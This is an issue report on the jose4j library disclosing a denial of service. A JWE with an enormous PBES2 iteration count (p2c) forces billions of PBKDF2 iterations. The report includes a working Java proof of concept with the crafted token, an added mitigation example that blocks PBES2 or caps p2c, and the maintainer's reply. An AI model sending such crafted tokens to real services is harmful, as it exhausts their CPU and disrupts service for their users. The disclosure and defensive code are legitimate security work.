DoS attack via specifically crafted JWE

Issue #212 closed
Jesse Yang created an issue

Description

The JWE key management algorithms based on PBKDF2 require a JOSE Header Parameter called p2c (PBES2 Count). This parameter dictates the number of PBKDF2 iterations needed to derive a CEK wrapping key. Its primary purpose is to intentionally slow down the key derivation function, making password brute-force and dictionary attacks more resource-intensive.

Therefore, if an attacker sets the p2c parameter in a JWE to a very large number, it can cause a lot of computational consumption, resulting in a DoS attack.

POC

import org.jose4j.jwa.AlgorithmConstraints;
import org.jose4j.jwe.ContentEncryptionAlgorithmIdentifiers;
import org.jose4j.jwe.JsonWebEncryption;
import org.jose4j.jwe.KeyManagementAlgorithmIdentifiers;
import org.jose4j.keys.AesKey;
import org.jose4j.lang.ByteUtil;

import java.security.Key;

public class jwt {
    public static void main(String[] args) throws Exception {
        // Any key bytes will do: the receiver has to run the full PBKDF2 derivation
        // before it can discover that the key is wrong.
        Key key = new AesKey(ByteUtil.randomBytes(16));
        JsonWebEncryption jwe = new JsonWebEncryption();
        // Explicitly permit the PBES2 key management algorithm so the library processes the header.
        jwe.setAlgorithmConstraints(new AlgorithmConstraints(AlgorithmConstraints.ConstraintType.PERMIT,
                KeyManagementAlgorithmIdentifiers.PBES2_HS256_A128KW));
        jwe.setContentEncryptionAlgorithmConstraints(new AlgorithmConstraints(AlgorithmConstraints.ConstraintType.PERMIT,
                ContentEncryptionAlgorithmIdentifiers.AES_128_CBC_HMAC_SHA_256));
        jwe.setKey(key);
        // The protected header below decodes to:
        // {"alg":"PBES2-HS256+A128KW","enc":"A128CBC-HS256","p2c":2000000000,"p2s":"uElPPhI-8FchwkPa"}
        jwe.setCompactSerialization("eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJ1RWxQUGhJLThGY2h3a1BhIn0=.JOIw8ccIdkor7-ZaHQz6pUkqj2VEL_XIuonOwdSrdeXxFb7qN8FZKw.1-ZgAG8KzCbl6wDjUzrsTw.0pLJ0ZEu9OMYV1jyfPIrqg.gFNkCEwB1lf_Jovc7ZOd5w");
        // getPayload() triggers decryption, which first derives the wrapping key with
        // 2,000,000,000 PBKDF2 iterations; the CPU time is spent whether or not the key matches.
        System.out.println("Payload: " + jwe.getPayload());
    }
}

Recommendations

Set an upper limit for p2c, e.g. 100000.
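
As an added example (not part of the issue report and not jose4j's own code), the following shows the two mitigations a consumer of the library can apply on its side today: block the PBES2 algorithms outright on endpoints that never expect password-based JWEs, and, where PBES2 must be accepted, read p2c from the parsed header and reject oversized values before any key derivation runs. It assumes the jose4j 0.9.x API as I know it (`getHeader` on `JsonWebStructure` returning the parsed JSON value, `PbkdfKey` for the password, and `setCompactSerialization` only parsing the parts without deriving keys, so the check happens before the first PBKDF2 iteration). `MAX_P2C` is a policy value borrowed from the recommendation above, not a library constant, and the class and method names are mine.

```java
import org.jose4j.jwa.AlgorithmConstraints;
import org.jose4j.jwa.AlgorithmConstraints.ConstraintType;
import org.jose4j.jwe.JsonWebEncryption;
import org.jose4j.jwe.KeyManagementAlgorithmIdentifiers;
import org.jose4j.keys.PbkdfKey;
import org.jose4j.lang.JoseException;

public class Pbes2Guard {
    // Assumed policy value: the most PBKDF2 iterations we will spend on one inbound JWE.
    static final long MAX_P2C = 100_000L;

    // Mitigation 1: block every PBES2 alg. Apply this on any endpoint that never
    // expects password-based JWEs, so a crafted p2c is never even looked at.
    static final AlgorithmConstraints NO_PBES2 = new AlgorithmConstraints(ConstraintType.BLOCK,
            KeyManagementAlgorithmIdentifiers.PBES2_HS256_A128KW,
            KeyManagementAlgorithmIdentifiers.PBES2_HS384_A192KW,
            KeyManagementAlgorithmIdentifiers.PBES2_HS512_A256KW);

    // Mitigation 2: bound p2c. Reads the parsed "p2c" header and rejects anything
    // that is missing, non-numeric, non-positive or above MAX_P2C.
    static long checkedIterationCount(JsonWebEncryption jwe) throws JoseException {
        Object p2c = jwe.getHeader("p2c");
        if (!(p2c instanceof Number)) {
            throw new JoseException("p2c header missing or not a number");
        }
        long count = ((Number) p2c).longValue();
        if (count < 1 || count > MAX_P2C) {
            throw new JoseException("p2c=" + count + " outside allowed range 1.." + MAX_P2C);
        }
        return count;
    }

    // Decrypts a PBES2 JWE only after the iteration-count check has passed.
    static String decryptPbes2(String compact, String password) throws JoseException {
        JsonWebEncryption jwe = new JsonWebEncryption();
        jwe.setAlgorithmConstraints(new AlgorithmConstraints(ConstraintType.PERMIT,
                KeyManagementAlgorithmIdentifiers.PBES2_HS256_A128KW));
        jwe.setCompactSerialization(compact); // parses header and parts; no key derivation yet
        checkedIterationCount(jwe);           // fail fast before any PBKDF2 work
        jwe.setKey(new PbkdfKey(password));
        return jwe.getPayload();              // PBKDF2 runs here, bounded by MAX_P2C
    }

    // Decrypts with the blocking constraints: a PBES2 header is refused by the library itself.
    static String decryptNonPbes2(String compact, java.security.Key key) throws JoseException {
        JsonWebEncryption jwe = new JsonWebEncryption();
        jwe.setAlgorithmConstraints(NO_PBES2);
        jwe.setCompactSerialization(compact);
        jwe.setKey(key);
        return jwe.getPayload();
    }

    public static void main(String[] args) {
        // The crafted token from the issue above (p2c = 2000000000).
        String poc = "eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJ1RWxQUGhJLThGY2h3a1BhIn0="
                + ".JOIw8ccIdkor7-ZaHQz6pUkqj2VEL_XIuonOwdSrdeXxFb7qN8FZKw.1-ZgAG8KzCbl6wDjUzrsTw.0pLJ0ZEu9OMYV1jyfPIrqg.gFNkCEwB1lf_Jovc7ZOd5w";
        try {
            decryptPbes2(poc, "hunter2"); // "hunter2" is a placeholder password
            System.out.println("unexpected: token was processed");
        } catch (JoseException e) {
            System.out.println("rejected before key derivation: " + e.getMessage());
        }
    }
}
```

The order of calls in `decryptPbes2` is the whole point: the header is inspected between `setCompactSerialization` and `getPayload`, so the 2,000,000,000-iteration derivation never starts. The bound should be chosen from what the application's own encryptors emit; a value far above that only widens the DoS window without improving the password's protection.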

Comments (4)

  1. Brian Campbell repo owner
    • changed status to open

    Thanks for raising this Jesse. I actually looked into this some a while back after this talk/white-paper[1] came out. The few production applications that I had access to were all using JWE AlgorithmConstraints such that they wouldn't even process a PBES2 JWE. So it didn't seem really urgent and I put it on the back burner intending to address it later. But honestly then sort of forgot about it. So thanks for bringing it back into the attention queue. The library should have some better default protections. Like a max p2c but also adding the PBES2 algs to default JWE AlgorithmConstraints to be blocked.

    [1] https://i.blackhat.com/BH-US-23/Presentations/US-23-Tervoort-Three-New-Attacks-Against-JSON-Web-Tokens.pdf

    https://i.blackhat.com/BH-US-23/Presentations/US-23-Tervoort-Three-New-Attacks-Against-JSON-Web-Tokens-whitepaper.pdf
